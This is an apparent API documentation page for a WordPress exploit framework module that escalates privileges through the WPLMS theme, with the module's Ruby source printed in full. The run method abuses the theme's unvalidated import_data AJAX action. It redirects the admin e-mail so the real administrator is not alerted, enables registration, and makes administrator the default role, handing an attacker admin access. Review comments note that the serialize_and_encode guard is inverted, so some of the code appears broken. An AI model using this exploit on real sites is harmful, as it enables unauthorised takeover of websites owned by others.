Class: Wpxf::Auxiliary::WplmsPrivilegeEscalation
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
- #initialize ⇒ WplmsPrivilegeEscalation (constructor) — A new instance of WplmsPrivilegeEscalation.
- #php_serialize(value) ⇒ Object
- #requires_authentication ⇒ Object
- #run ⇒ Object
- #serialize_and_encode(value) ⇒ Object
- #set_wp_option(name, value) ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ WplmsPrivilegeEscalation
Returns a new instance of WplmsPrivilegeEscalation.
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 10
# Runs the parent constructor and then registers this module's metadata
# (name, description, authors, references, date) through +update_info+.
#
# The description is passed together with +desc_preformatted: true+, so the
# whitespace inside the %() literal is presumably rendered verbatim — keep it
# as-is when editing.
def initialize
  super
  update_info(
    name: 'WPLMS Theme Privilege Escalation',
    desc: %( The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an authenticated user of any user level to set any system option due to a lack of validation in the import_data function of /includes/func.php. The module first changes the admin e-mail address to prevent any notifications being sent to the actual administrator during the attack, re-enables user registration in case it has been disabled and sets the default role to be administrator. This will allow for the user to create a new account with admin privileges via the default registration page found at /wp-login.php?action=register. ),
    desc_preformatted: true,
    author: [
      'Evex', # Vulnerability discovery
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '7785']
    ],
    date: 'Feb 09 2015'
  )
end
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 41
# Fingerprints the installed WPLMS theme from its readme and reports whether
# the detected version lies within the range this module targets.
#
# The two version strings bracket the range given in the module description
# (1.5.2 through 1.8.4.1 affected, 1.8.4.2 not); argument order follows
# +check_theme_version_from_readme+, which is defined outside this file.
#
# @return [Object] the result of +check_theme_version_from_readme+
def check
  theme_slug = 'wplms'
  upper_version = '1.8.4.2'
  lower_version = '1.5.2'
  check_theme_version_from_readme(theme_slug, upper_version, lower_version)
end
#php_serialize(value) ⇒ Object
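# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 49
# Serializes a scalar into PHP's +serialize()+ wire format.
#
# Only strings and numbers are required by this module, so every other type
# deliberately yields nil (callers treat nil as "could not serialize").
#
# Symbols are converted with +to_s+ first: Symbol has no +bytesize+, so the
# original shared String/Symbol branch raised NoMethodError for symbols.
#
# @param value [String, Symbol, Integer] value to serialize
# @return [String, nil] +s:<bytes>:"<text>";+ for strings/symbols,
#   +i:<n>;+ for integers, nil for anything else
def php_serialize(value)
  case value
  when String, Symbol
    text = value.to_s
    # PHP records the byte length, not the character count.
    "s:#{text.bytesize}:\"#{text}\";"
  when Integer
    "i:#{value};"
  end
end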
#requires_authentication ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 45
# Always true: the module posts to admin-ajax with a session cookie
# (see set_wp_option), so it cannot run unauthenticated.
#
# @return [Boolean]
def requires_authentication = true
#run ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 89
# Module entry point. After the parent +run+ succeeds, writes three WordPress
# options through set_wp_option in order and aborts at the first call that
# returns nil (serialization failure or no HTTP response).
#
# NOTE(review): set_wp_option only warns on a non-200 status and still
# returns the response object, so a rejected write is reported here as
# success. Confirm whether the status should be checked in this method too.
#
# @return [Boolean] true when all three option writes returned a response,
#   false otherwise
def run
  return false unless super

  # Random local part and domain; Utility::Text.rand_alpha is defined
  # outside this file.
  new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
  emit_info "Changing admin e-mail address to #{new_email}..."
  if set_wp_option('admin_email', new_email).nil?
    emit_error 'Failed to change the admin e-mail address'
    return false
  end

  emit_info 'Enabling user registrations...'
  if set_wp_option('users_can_register', 1).nil?
    emit_error 'Failed to enable user registrations'
    return false
  end

  emit_info 'Setting the default user role...'
  if set_wp_option('default_role', 'administrator').nil?
    emit_error 'Failed to set the default user role'
    return false
  end

  # Defender note: the three writes above are separate admin-ajax POSTs with
  # action=import_data (see set_wp_option); the changed admin_email,
  # users_can_register and default_role options are the observable
  # artefacts of a completed run.
  register_url = normalize_uri(full_uri, 'wp-login.php?action=register')
  emit_success 'Privilege escalation complete'
  emit_success "Create a new account at #{register_url} to gain admin access."
  true
end
#serialize_and_encode(value) ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 59
# PHP-serializes +value+ and Base64-encodes the result for the request body
# built in set_wp_option.
#
# NOTE(review): as written, the guard returns nil whenever php_serialize
# produced a string, and only reaches strict_encode64 when the serialized
# value is nil (where strict_encode64 raises TypeError). set_wp_option treats
# a nil return as a serialization failure, so confirm the intended condition.
# NOTE(review): Base64 needs +require 'base64'+; the require is not visible
# in this excerpt.
#
# @param value [String, Symbol, Integer] value accepted by php_serialize
# @return [String, nil]
def serialize_and_encode(value)
  serialized_value = php_serialize(value)
  return nil unless serialized_value.nil?

  Base64.strict_encode64(serialized_value)
end
#set_wp_option(name, value) ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 66
# Writes one WordPress option via the theme's admin-ajax +import_data+
# action, sending the option name and the serialized, Base64-encoded value.
#
# @param name [String] option name
# @param value [String, Symbol, Integer] option value; passed through
#   serialize_and_encode before sending
# @return [Object, nil] the response object from execute_post_request, or nil
#   when the value could not be serialized or no response was received.
#   A non-200 status is only warned about; the response is still returned.
def set_wp_option(name, value)
  encoded_value = serialize_and_encode(value)
  if encoded_value.nil?
    # The trailing +true+ is a positional flag of emit_error whose meaning
    # is not visible in this file.
    emit_error "Failed to serialize #{value}", true
    return nil
  end

  res = execute_post_request(
    url: wordpress_url_admin_ajax,
    params: { 'action' => 'import_data' },
    body: { 'name' => name, 'code' => encoded_value },
    # NOTE(review): hash shorthand (Ruby 3.1+) resolving to a +cookie+
    # method or local that is not visible here — confirm it carries the
    # authenticated session cookie.
    cookie:
  )

  if res.nil?
    emit_error 'No response from the target', true
  elsif res.code != 200
    emit_warning "Server responded with code #{res.code}", true
  end

  res
end